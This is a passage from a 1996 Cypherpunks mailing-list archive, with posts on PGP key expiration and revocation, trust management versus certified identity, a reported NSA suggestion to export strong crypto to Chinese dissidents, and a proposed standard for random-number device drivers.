zMrkZ2xcvgAnq0FGG//awz8bveFyff1U2PL7xtHdvmNi6mtgzNah9L8yZCLqtmAD
Uerh9+Qq9MSq6bidHBadVqwUr2y/7/1IWiYiMFqGZou7Gmwiu4AQDtKi04bVGi4b
/VJHVe1/eyoN6nV7PyOWJsigP01+ZJblPgeg8Q37Mf8x7Hxjz5bWuFraS6jO+aNZ
EduLoSyulblNKIWs3WRP339RJL0kAsPycdSfh6VVVUQRiHv5uaigyQ==
=wcp/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 7 Jan 1996 09:07:26 +0800
To: "'mab@research.att.com>
Subject: RE: "trust management" vs. "certified identity"
Message-ID: <01BADC99.C7034FE0@dialup-169.dublin.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


On Saturday, January 06, 1996 10:32, Matt Blaze[SMTP:mab@research.att.com] wrote:
>The discussions here of the limits of PGP's certification and
>revocation model are close to the core of some work I've been doing
>(with Joan Feigenbaum and Jack Lacy) on what we call the "trust
>management" problem.
>
>Essentially we consider the consequences of abandoning the notion
>of "certified identity" implicit in systems like X.509 and PGP and
>subsuming identity under the more general umbrella of specifying
>and determining what a key is trusted to do.

This is an interesting idea.  I think, though, that there's
something to be said for keeping identity and privilege separate
things to be vouched for.  For one thing privileges and policy change
but identity doesn't.  Privilege is also relative, but identity is not (nyms
and that aside).  I'm Frank O'Dwyer anywhere I go, but I'm not 
"loyal bank customer" to all banks. Also, it's easier to securely determine 
that I'm Frank O'Dwyer than it is to securely determine (say) my credit limit.
So, a signator's job in signing for my identity is easier (and less risky) than 
signing for my trustworthiness.  And we still don't have many CAs signing
for identity!  Plus, given secure identity (which might be an anonymous 
id), you can layer the other stuff on top.  

That's not to say that the certification approach can't be general, though.  
It occurred to me that a very general certificate format would
simply be to sign some assertions (predicates), and then 
feed all available signed predicates plus some axioms (the analogue 
of root keys) into a theorem prover.  Sounds slow though.  More 
practically perhaps, you could sign some kind of (safe) interpreted code, 
and have the verifier execute it on some initial variable set to come up with
some access decision.  

I haven't read your paper yet though!  I'll read it and get back to you.
There does seem to be something about current models of certification
that inhibits their take up, so it's good to hear something new in this area...

Cheers,
Frank O'Dwyer
fod@brd.ie                          http://www.iol.ie/~fod





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 7 Jan 1996 08:42:48 +0800
To: cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
Message-ID: <199601070023.BAA04907@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



At 06:31 PM 1/6/96 -0500, Perry Metzger wrote:
>
>This is cypherpunks, not Mitnick punks, Shimomura punks, or anything
>similar. I personally don't care about Kevin Mitnick, and he most
>certainly has little to no cryptography relevance at this point. Take
>it elsewhere.

C'mon, Perry, give it a break.  Mitnick's case has to do with security
issues as well as the violations of privacy and/or search and seizure
the government used to arrest him.
It may not be cryptography per se, but are you going to seriously argue
that security, etc. is not encompassed in crypto issues?
I found it interesting.  If you didn't, then all you had to do was
delete it.  No one needs to read your personal crusade as *The One*
who tells us what's relevant and what's not.



 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 8 Jan 1996 07:26:32 +0800
To: cypherpunks@toad.com
Subject: NSA says strong crypto to china??
Message-ID: <199601070941.BAA12858@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  This is a quote from an article by Paul Vallely in The Independent, London,
which can be found here:

http://nytsyn.com/live/News3/006_010696_101827_2723.html

> What one government regards as harmful material is an instrument of freedom
> and democracy to another.  Officials at the US National Security Agency have
> suggested that Internet encryption technology - a sophisticated method of
> encoding information - be deliberately exported to Chinese dissidents to
> help them in their fight against their government - even though its export
> is otherwise banned under US arms control regulations.

  Does anyone know of real documentation of this "suggestion" from the NSA?
It quite telling, though no surprise to any of us I'm sure, that they would
think that strong crypto should be a tool of freedom in china, but not in
this country.

  Maybe they should get Microsoft to insert subliminal directions for
downloading PGP into a future episode of "My Computer Family".  :-)

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw/
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 7 Jan 1996 18:14:03 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <199601070941.BAA12858@ammodump.mcom.com>
Message-ID: <199601070958.BAA04319@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   Does anyone know of real documentation of this "suggestion" from the NSA?
> It quite telling, though no surprise to any of us I'm sure, that they would
> think that strong crypto should be a tool of freedom in china, but not in
> this country.

	But they do. That's why they don't want it. That too should be
obvious. I think though, that this is an example of the two major
functional halves of the NSA, with rather opposite goals: COMSEC
vs. COMINT.

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 7 Jan 1996 16:09:52 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Internet & Porno on A&E tonite
Message-ID: <v02140a0cad14e7df8f74@[165.254.158.230]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 1/6/96, Jim Choate wrote:

>Hi,
>
>Just saw an add for a Investigative Reports show tonite on A&E dealing with
>the Internet and some of the current issues relating to porno and privacy.
>
>
>                                              Jim Choate

I just got done watching it. Heavy on the porno and Light on the privacy.
It did cover some of our hot buttons but stayed away from talking about
their context (ie: They covered the TN prosecution of the CA BBS owner but
ignored the question of if it was a prosecution or a persecution [as well
as the question of if the charge/trial was legal in the first case]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 7 Jan 1996 16:09:55 +0800
To: blanc <blancw@accessone.com>
Subject: Re: FW: Undeliverable: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02140a0dad14ebf68585@[165.254.158.230]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 1/6/96, blanc wrote:

>From:   Steve14571@aol.com
>
>Something else I want to know...  Why is my mail going through microsoft.com?
>...........................................................................
>............................
>
>There is an email 'alias' at Microsoft which was subscribed to the cpunk
>list, to receive and distribute the cpunk list to members of that alias.
>
>A new beta version of Exchange is being used on a test basis by some
>departments (apparently all of the cpunks at MS are using it), and the
>programmers recently encountered a "little complication" (to use a phrase
>from the movie 'Brazil').   I'm told that the problems were corrected, but
>that now the spoolers are releasing messages which were backed up while
>mail delivery was put on hold.   I hate to agree with Timothy C. May, but
>it is probably best to "use technology " to deal with it for a day or so.
>
>   ..
>Blanc


I had a bounce from another list (<corp-welfare@ursus.jun.alaska.edu>) so
it is not only cypherpunks which is having the problem.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 7 Jan 1996 22:04:34 +0800
To: cypherpunks@toad.com
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <199601070941.BAA12858@ammodump.mcom.com>
Message-ID: <199601071037.EAA00310@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> > What one government regards as harmful material is an instrument of freedom
> > and democracy to another.  Officials at the US National Security Agency have
> > suggested that Internet encryption technology - a sophisticated method of
> > encoding information - be deliberately exported to Chinese dissidents to
> > help them in their fight against their government - even though its export
> > is otherwise banned under US arms control regulations.

If this is true, it's great news.  It would mean that the NSA is adopting
both cypherpunk analysis and tactics.  Who would have thought?  An NSA 
remade in Tim May's image.

>   Does anyone know of real documentation of this "suggestion" from the NSA?
> It quite telling, though no surprise to any of us I'm sure, that they would
> think that strong crypto should be a tool of freedom in china, but not in
> this country.

The NSA is a big organization with a lot of people in it.  It could be 
that the people in charge of thinking about Chineese dissidents are far 
removed from the people who think about domestic crypto.

I'm skeptical about this story, but it would be a sensible policy for us
to pursue.  But not just with dissidents, and not just in China.  We ought
to try to create an environment in which people who want to do business
need to have access to strong crypto in order to interoperate with the
rest of the world.  Pump high quality free tools out to the world, and
push for solid standards for encrypted communications.  And make sure 
those Chineese and Iraqi dissidents always have a safe way to post 
anonymously.

We're already living in a world in which it's necessary to give people
computers if you want them to be competitive economically.  Let's try to
make giving people computers the functional equivilant of abandoning any
hope of making censorship work.

I doubt they're interested in doing this, but I don't understand why.  
It's a sensible policy.  Can you imagine what would happen to freedom and 
privacy around the world if the NSA went cypherpunk?  In the space of a 
month they could eliminate the possibility of totalitarianism world 
wide.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.cs.byu.edu>
Date: Sun, 7 Jan 1996 22:39:50 +0800
To: cypherpunks@toad.com
Subject: Key Expirations (was: Revoking Old Lost Keys)
Message-ID: <199601071308.GAA00421@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

>From: shamrock@netcom.com (Lucky Green)
>At 15:45 1/6/96, Bill Frantz wrote:
>>Perhaps if keys could be made with expiration dates (certificates too),
>>this problem might be reduced to managable proportions.
>
>I would very much like to see expiration dates on public keys. Is PGP 3.0
>offering this feature?

(it would be nice to know of anything that PGP 3 will be offering)


>From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
>
>Keys should have built-in expiration dates (adjustable by the user
>manually the way one would change their user-id, passphrase, etc.)

I disagree, I think a key should be be given a specific lifetime. A
master key, for example, might be given a life of 7-10 years, while a
common-use key a life of, for example, 2-5 years. 

>PGP should give a warning when the key passes the expiration date. It
>should not prevent you from using it, but should remind you that the
>key is rather old, and that the owner may have moved, etc.

I disagree. I think that it's the key owners' responsibility to provide
transitions to a new key. (it would be nice to have a mechanism to auto
transfer signatures to a new key, but I can't see that being both safe
and practical)

I also would also like to see PGP/keyservers with more of a current-status
paradigm, rather than a from-the-beginning-of-time model. A "my master key
is foo" and "I'm master of: fiz, bar, baz" fields would encourage the emergant
practice of having a secure master key, and a common key that is replaced
more often. Not-Secure Systems are Not-Secure Systems, and there should be
Not-Secure keys to be used on these ISP/multiuser/whatever systems, without
resorting to multiple keys, mutually signed, that merely proclaim their
properties in the key ID. 

I'm certainly not calling for Someone[tm] to code it up, only pleading that
the paradigms be established conceptually, so that everyone knows (and
hopefully agrees) where it's going. We have security (stealth pgp, if
generally indistinguishable from random data, will ensure that, and prevent
all but human betrayal or tremendously draconian outlawing of random data
from taking that security from us) but we do not have seamlessness, and we
do not have a PGP that fits how PGP is being used, and not knowing if these
things have even been planned is distressing.

>Users who want to extend the life of their keys should send special
>certificates (at least once a year or every other year?) that tell
>keyservers and those with copies of their public keys that the key is
>still being used, and to update the expiration time.

I can only this working elegantly if the expiration date, as a signed block,
could be expunged and a new expiration date block put in. Signatures, of
course, would have to authenticate the parts that don't change. If the
expiration date is inside the _owner's_ authentication block, everything
would still be attack-resistant. (Everything absolutely should be designed to
resist spoofing, etc. I would like to see PGP _IGNORE_ key ID's that are not
signed, and naturally default to signing key-IDs when being added.)

I too would like would like to see expiration dates built into the keys.
The PGP key has too much of a static-model, long life paradigm. IMHO, I see
two problems. First, key signature are for the key/ID string pair. Every time
someone changes email addresses, a clunky ID string addition is made to the
key, and subsequent signatures are made to _that_ pair. I don't disagree that
it should be this way, only suggest that a more integrated, conceptual view
even, should be presented.

While I'm presenting my wish list, it would also be nice for PGP to be able
to extract keys that are in the Web Of Trust[tm] relative to an arbitrary
key. I attempted to do something like this with by Web Of Nobody's keyring
for those of you who didn't see my posts, that's what I called what I
generated because the brute-force way I extracted it necessitated the
signatures going the opposite direction than they should have, resulting in 
a great many nobody's and missing a few somebody's.) which reduced the then-5
meg keyring to 1 meg. (I am considering doing it again, since I still don't
know enough PERL to generate a web of trust instead of a web of nobodies)

A feature like this would, in my opinion, largely negate (or at least greatly
delay) the need for a DNS-style key lookup. And, after all, what's the
purpose in having a list of all keys in the world, why not just have a list
of keys that are actually interrelated, extracted from the former. Perhaps
even a batch-mode "copy all new and trusted keys from keyring X", THAT would
help tremendously with a "locally-trusted" / "globally known" dual-use of
PGP and its keys.

>From: "Frank O'Dwyer" <fod@brd.ie>
>portion of the) web of trust was very large, you might find that the old key 
>kept popping up and you kept getting mail 
...
>It's just that PGP's certificates are particularly long-lived, and PGP's
>revocation is particularly broken. Luckily the data formats do allow for a
>validity time, and a revocation of a key's countersignature, so this can
>perhaps be fixed sometime.
...
>uploading their key with additional signatures.  A practical solution
>might be for the key servers to automatically remove keys older than X 
>years (or some time limit related to the key size).  Ultimately though, what 
>is needed is a new revocation model (maybe implementing the unused fields 
>in the PGP certs is good enough to begin with).

This is all a me-too. As I said, I would like to see a current, how-it-is-now
list, rather than having keys whose replacement's replacements' replacements
have been revolked long ago.


>On Sat, 6 Jan 1996 09:47:16 -0000, "Frank O'Dwyer" <fod@brd.ie> wrote:
>
>The PGP formats do allow for a 'revocation' certificate, but PGP doesn't
>implement it (yet, I guess).  In any case, it's not really strong enough, 
>since what it says is "I retract all my previous statements that this key is 
>related to this user".  This'd mean that you'd have to visit everyone who'd
>ever signed your key and get them to issue this retraction. What would be
>needed for this problem is either an "anti-certificate" ("This key does not
>belong to this user"), or else some convention. For example, if two _trusted_
>keys are found for the same uid, the most recent one could be chosen, and
>the earlier one be purged from keyservers, etc.  This may be possible with
>current PGP.  I haven't tried it, but since I have some keys which have
>fallen into disuse, I will need to do so sometime.).

I think this is a feature that would be good to have, not necessary for
all signatory parties to retract sigs, but certainly for one or more of
them to do so. I do think, however, that both should be kept (and not
just one cancel another like a current-status model would) and that perhaps
the two should default to not being displayed, but certainly PGP explain it
as "X revokes signature, contact both parties for explanation" type of thing;
let the human be the judge.

Don

PS: This message may be double-signed, don't think it unusual if it is.
- - --- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMO/FtsLa+QKZS485AQGcSwL/eyUiZ4YgKfLyQx94K+Vm/y2Jmsx1DnOm
Anvv2EA98qY1wBxpg2HUCrV2NO97vafTPNJ5dcZsLUIDOnzjw3Pxj7ikNTnwL45Q
89NVqc6jHG3NCbIirDTPSN/q20N2yhEA
=qRq9
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMO/FzcLa+QKZS485AQG8OQMAj9mDA9v7f68cKDl4z8JLieFsFo4EtzJb
XDna9JXvYQj/tBd+AFuBNxhawzIgSn7ydIw/QtRcE/a9HbAY4eJDfuEANfoKZARb
TpxLWpmGU1uDidEB9irGxGGZd4uen7Mz
=Ku7l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 7 Jan 1996 15:17:46 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601070707.CAA25933@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jan 1996 03:10:49 +0000, "Michael C. Peponis"
<mianigand@unique.outlook.net> wrote:


>If it's widley distributed, or on a keyserver, that becomes hard.  
>First you would have to be authenticated as the origional key owner, 
>ie how do I realy know that you are you, and not somebody saying you 
>are the orgional key owner?

[..]
>Good topic. 

Interesting, yes.  Also a possible attack...

Alice sends a PGP'd message to Charlie, but gets a reply from
"Charlie" saying that they original key was lost due to a hard drive
crash, etc.... and that she should coinsider it revoked.

Is that message from Charlie or from Mallet (the demonic SysAdmin),
who is trying to get in between Alice and Charlie...?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 7 Jan 1996 15:22:47 +0800
To: CPunks <cypherpunks@toad.com>
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601070714.CAA02909@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 05 Jan 1996 23:07:19 -0800, Bruce Baugh <bruceab@teleport.com>
wrote:

>I'd like to bring up a problem I haven't seen addressed much yet, and which
>I think is going to come up with increasing frequency as PGP use spreads.

>The problem is this: how can one spread the word that an old key is no
>longer to be used when one no longer has the pass phrase, and cannot
>therefore create a revocation certificate?

[..]

Keys should have built-in expiration dates (adjustable by the user
manually the way one would change their user-id, passphrase, etc.)

PGP should give a warning when the key passes the expiration date. It
should not prevent you from using it, but should remind you that the
key is rather old, and that the owner may have moved, etc.

Users who want to extend the life of their keys should send special
certificates (at least once a year or every other year?) that tell
keyservers and those with copies of their public keys that the key is
still being used, and to update the expiration time.

Comments?

--Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 8 Jan 1996 00:34:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601070721.CAA03941@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jan 1996 09:47:16 -0000, "Frank O'Dwyer" <fod@brd.ie> wrote:

[..]
>The PGP formats do allow for a 'revocation' certificate, but PGP doesn't
>implement it (yet, I guess).  In any case, it's not really strong enough, 
>since what it says is "I retract all my previous statements that this key is 
>related to this user".  This'd mean that you'd have to visit everyone who'd ever 
>signed your key and get them to issue this retraction. What would be needed 
>for this problem is either an "anti-certificate" ("This key does not belong to this 
>user"), or else some convention. For example, if two _trusted_ keys are found for the 
>same uid, the most recent one could be chosen, and the earlier one be purged 
>from keyservers, etc.  This may be possible with current PGP.  I haven't tried it, 
>but since I have some keys which have fallen into disuse, I will need to do so 
>sometime.).

Revocation of signatures is a good thing, but beware of
anti-certificates, since one can create a nasty web of affirmations
and denaials that is unresolvable. (Yes, literally from Logic 101
classes about paradoxes....)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.miranda3@genie.com
Date: Sun, 7 Jan 1996 15:53:50 +0800
To: cypherpunks@toad.com
Subject: info
Message-ID: <199601070733.AA020080001@relay1.geis.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone have any connections with the alternative/underground rock
scene. I have been reality surfing it here in the L.A. area
and am looking for people who are interested in coming along to assorted
indsutrial/techno/gothic/rave places.

Also, are there any cybernetic developments related to this scene

I was thinking of something along a program which would
be used when employing the mini-monitors (which you wear like
sunglasses).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 7 Jan 1996 22:33:44 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: RE: "trust management" vs. "certified identity"
Message-ID: <01BADCE4.66BC9880@dialup-100.dublin.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday, January 07, 1996 12:22, Futplex[SMTP:futplex@pseudonym.com] wrote:>Frank O'Dwyer writes:
>[I've adjusted the line breaks for those of us with 80-column displays]

Apologies - this mailer doesn't give me any indication
where the margin is.
[...]
>>a signator's job in signing for my identity is 
>> easier (and less risky) than signing for my trustworthiness.  

>I am doubtful. I can't vouch for the identities of very many people on this 
>list. (I've even met, e.g., Lucky in person and I certainly have no clue
>what his verinym might be, nor do I particularly care.) On the other hand, I
>am willing to sign onto all sorts of judgements about the trustworthiness of
>various people on the list, and other aspects of their reputations. I've
>driven hundreds of miles based on trust developed online with people whose
>identities I still haven't verified. I've even agreed to loan hundreds of
>dollars to someone I knew only as an online pseudonym.

I'm not saying that trust requires identity (it obviously doesn't,
since we all make trusted cash transactions all the time
without having to produce any id.).  But it is usually easier to
determine (and vouch for) who a stranger is than how trustworthy 
they are, if only because there are quick and easy real-world 
mechanisms for this (driver's licence, passport,etc.).   That's all 
I meant.

(BTW, can you lend me a few bucks? :-)
 
[...]
>I am swayed by the view expounded by Carl Ellison that a key, not an
>identity, should be the anchor to which attributes are attached. (Sorry if
>I am misstating or oversimplifying the position here.) I think identity 
>should be hung off the key as just another (optional) attribute.

That's an extremely useful way of looking at it, I agree.
But the lifetime of a key is often less than that of some
attribute.  It's easy to imagine one email address having
a succession of keys.  But then again, one might
acquire and discard email address more often than
keys (I've gone through three addresses in the last year 
or so).  So perhaps a better model is just a loose 
assocation of attributes, with "key(s)" and "identity(s)"
being two very interesting ones, but no one attribute
being primary all the time.

(I'm thinking out loud here -- I'm actually trying to come
up with some C++ classes for this sort of stuff, so this
discussion is pretty interesting to me.  Thus far, I'd got 
to the model you describe - a key has a bunch of 
attributes, one them identity. But now I'm thinking that
this maybe isn't enough, and an 'identity-centric' view is
also needed.  Perhaps there should be multiple views
into the same data?).

>I think your comments apply pretty well to trust relationships in the flesh,
>but don't fully take the net into account.

Right.  I was only talking about 'verinyms', really.

Cheers,Frank O'Dwyer
fod@brd.ie                          http://www.iol.ie/~fod





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 7 Jan 1996 23:24:35 +0800
To: cypherpunks@toad.com
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <199601071037.EAA00310@proust.suba.com>
Message-ID: <Pine.SV4.3.91.960107093454.13251D@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Yeah but if NSA went Cypherpunks, what would be the new PC dogma - the 
current San Fransisco trendlines?   If you aren't a Sensitive Guy who'd  
rather re-read Hillary's speech at the Beijing Women's Conference, than 
watch the jittering cheerleaders on Monday Night Football - there goes 
your promotion!

Not to shatter your illusions boys, but there's a school of thought back
here East of the Rockies that the whole shebang south of Redding should be
written off after the next Big One - no taxpayer dollars spent _at all_. 
Commit American Imperialist Aggression against Mexico - use gunboat
diplomacy to make them take California back.  Only hold onto a few 
selected spots as Possessions. I mean, Vandenberg's on a very convenient 
spot for launching birds to listen in on the Beijing apparatchiks on the 
cellphone, running their mistresses in and out of the secret entrances of 
the Forbidden City faster than the JFK-era Secret Service could have kept up 
with.

Visit the hospitality room at the next annual convention of the Old 
Crows Association, if you want to see proof that the electronic-warfare 
community, like worker-bee military types in general nowadays, comprises 
LOTS of folks with a rather Libertarian outlook.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 8 Jan 1996 14:53:10 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: NSA says strong crypto to China?
Message-ID: <199601080625.WAA21243@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:23 PM 1/7/96 -0600, Alex Strasheim wrote:
> But I don't necessarily look at the
> NSA as an enemy.  Right now we're on opposite sides of an important issue,
> and I think they're doing a lot of damage.  But I tend to think that they
> believe what they're doing is in the national interest.  They're trying 
> to defend democracy -- our democracy, at least.

I see no sign that NSA is capable of distinguishing between the 
interest of the state and the interest of the nation.

It is perfectly clear that the threat that NSA is primarily 
concerned with comes from within, not from without.

> So the question we ought to be putting to the NSA is this:  isn't it in
> the best interest of the United States and the other capitalist Western
> democracies to impose the first ammendment on the rest of the world? 

There is this big myth, spread partly by the US government, 
and partly by the radical left, notably Chomsky, that the 
US has been protecting the world against socialism:  This 
is a load of old bananas.  The US government has been 
pro socialist -- not as pro socialist as the IMF, and the 
IMF has not been as pro socialist as the Soviets -- but the 
US has still been shoving socialism down peoples throats in a 
heavy handed way, because they could get away with that 
kind of stuff abroad, when they cop hell for it at home.

The nastiest piece of socialism was arguably the land reform
scheme in El Salvador, which converted the peasants from
tenants of a few powerful rural landlords, to serfs on state
run collective farms.  This screwed up agriculture big time,
and the peasants detested it.

If you want to use land reform to make peasants into anti 
communists, you use the method so successfully used in Taiwan.  
You make it possible for the peasant to buy land, and 
encourage him to buy land, and once he has some land of 
his own, and has sacrificed in order to obtain it, you can 
then trust him to resist communism.  If there are communist 
guerrillas around, you should give him a shotgun.

The US government followed a very different strategy in 
El Salvador, from which we may conclude that just as the 
South Vietnamese government considered that robbing
the Montagnards, and rendering them powerless and afraid 
was more important than resisting North Vietnamese communism, 
the US government similarly considered that suppressing private 
property, was more important than resisting communist 
infiltration in El Salvador.

El Salvador was vulnerable to communism because only two hundred
families owned everything worth owning.   If you want to prevent
communism the kind of land reform you need is land reform that
allows more people to acquire individual property rights.

> I don't think the NSA is out to suppress our liberties.  
> [...] it is a mistake to think of them as evil, as people who 
> will tell any lie to get what they want.

I disagree.

Two government officials, one of whom is a communist, have 
more in common than two communists, one of whom is a government 
official.  The NSA is on the same side as the Chinese government,
and if Chinese dissidents used crypto with US GAK, this information
would be exchanged with the Chinese government.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 8 Jan 1996 10:02:58 +0800
Subject: A /dev/random standard is need.
Message-ID: <DKt3sx.IoA@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm revising the DOS NOISE.SYS driver currently.  In writing the
documentation I am discussing the advantages of such a driver (part of
the logic behind writing it).

Mainly, a hardware (and to some extent) operating system independent
means is needed for generating random numbers.  It seems to me that a
device driver (at least for DOS, Unix and maybe Amiga or Atari) is the
best way to do this.  If one has special chips or diodes for
generating randomness, a device driver which reads from them can be
used. If one lacks such equipment, something like NOISE.SYS or
random.c for Linux, or Noiz (which I have not yet look at) can be
used.

Even then, random.c defines two devices, random (which only returns as
many bits as there are fresh bits in the entropy pool) and urandom
(which keeps hashing the bits and will return as many as requested.)

NOISE.SYS defines only random, which behaves more like urandom above.

If there is a standard, it will make it easier to use special hardware
since software which reads from a random device can access it.

Perhaps a kind of standard should be discussed and created so that
cross-platform development is made much easier, and so that features
and capabilities can be worked out.

Does anybody else see a need for this?


--Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 8 Jan 1996 00:51:18 +0800
To: mab@research.att.com (Matt Blaze)
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <199601062232.RAA12812@nsa.tempo.att.com>
Message-ID: <199601071633.KAA00530@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Comments and discussion appreciated.

This is very interesting stuff -- a big improvement, I think.

I have the impression that pm might look a little bit like an sql server. 
Is that in the ballpark?  Feeding pm an assertion might be analagous to
giving an sql server a command that defines a table, and a pm query might
be similar to an sql command that queries a database.  Whether or not
someone (some key) is allowed to change the assertions would be governed
by assertions that are already in place. 

Or are things going to be setup so that a querying application (like a 
mailer) will feed pm all the information it needs, including assertions, 
each time a query is made?

Although the name of the paper is "decentralized trust management", it
seems to me that the ability to implemenent centralized trust management
schemes would be useful for pm.  Centralized trust management has a lot
going for it as long as no one's being forced to accept it.  I would
expect that in a large organization the rules as well as the identities of
the players would change frequently.  Someone will decree that level j is
no longer sufficient to authorize purchase orders for $5000 or less, level
j+1 will be required in the future.

One advantage of the sql style server is that an organization's trust
manager could implement these changes for lots of work stations centrally,
independently of specific applications (ie., changes could affect all 
mailers).

A particular pm server on a workstation might know about different trust
models from different organizations.  Someone who reads cypherpunks at
work might have a set of assertions that his company's trust manager can
modify, a set of assertions about cypherpunks that Eric can modify, and
another set of assertions about personal correspondence that only the
server's owner can modify.  The server's owner could always do anything he
wanted -- an assertion that says a specific owner key can do anything
would be hardcoded into the system.

Does this make sense?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Mon, 8 Jan 1996 03:09:59 +0800
To: cypherpunks@toad.com
Subject: "Re: NSA says strong crypto to china??
In-Reply-To: <199601070941.BAA12858@ammodump.mcom.com>
Message-ID: <199601071847.KAA26014@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



   The original article in the Indpendent contained too many factual
inaccuracies to take the NSA statement at face value. Further, some of
the details resemble an interchange between Carl Ellison and the
OSTP. For the details, check out:
     http://www.clark.net/pub/cme/html/nist-ske.html 

Here's the relevant excerpt:

Sell to Chinese dissidents

In the opening session, Mike Nelson of the OSTP (Office of Science and
Technology Policy on the vice president's staff) presented his
discussion of the Key Escrow criteria. He was asked who in his right
mind would buy a product with a master key escrowed in the U.S., with
access by US Law Enforcement.

His answer was that a Chinese dissident would be quite happy to have
the key escrowed by a US agent, in the US, for US government access --
rather than by a Chinese agent, in China, for Chinese government
access.

That's a good plan, Mike. That's a huge market. I'm looking forward to
seeing the agreement with the People's Republic under which they allow
the importation of such products.

[end excerpt]

   My best guess is that we're seeing a distortion of this
interchange. If I were a Chinese dissident, I wouldn't want to use
GAK, for three reasons: using US-lackey encryption is certainly not
going to get you into any _less_ trouble than using independent
encryption, if you used GAK you'd be working as a US spy whether you
wanted to be or not, and finally, who says the Chinese can't decrypt
it, especially with the rapid growth of television.

Raph

P.S. To those who are suriprised that I'm still here - my flight got
